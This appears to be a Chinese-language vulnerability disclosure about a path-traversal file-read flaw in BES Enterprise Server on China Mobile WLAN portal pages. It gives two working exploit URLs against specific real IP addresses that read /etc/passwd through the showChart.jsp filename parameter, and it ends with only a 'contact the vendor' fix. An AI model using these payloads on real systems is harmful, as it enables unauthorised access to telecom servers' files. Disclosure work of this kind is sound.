BES Enterprise Server文件读取漏洞，貌似是应用服务器，用的人应该还是蛮多的

看着网络连接中那么多的无线热点，却没有一个是我的。。。。T_T

然后我就选择了CMCC，虽然还是无法访问其他互联网网站，但是CMCC自己的web页面还是可以访问的，然后就。。。。没有然后了

为什么不能从互联网直接访问移动WLAN的认证页面？！这不科学

找了湖北移动的WLAN和辽宁移动的一个ip做案例

湖北移动WLAN

http://221.176.1.140:8080/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd

这个链接好像不能通过互联网直接访问，需要连接CMCC的热点后才能访问

辽宁移动

http://211.137.34.226/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd



不晓得为什么不能读取shadow文件

CMCC:
 

 

 

 

用户还挺多的~
 

看了这个hosts，觉得移动的设备还是很多的。。。
 

 

 

 

修复方案：

联系厂商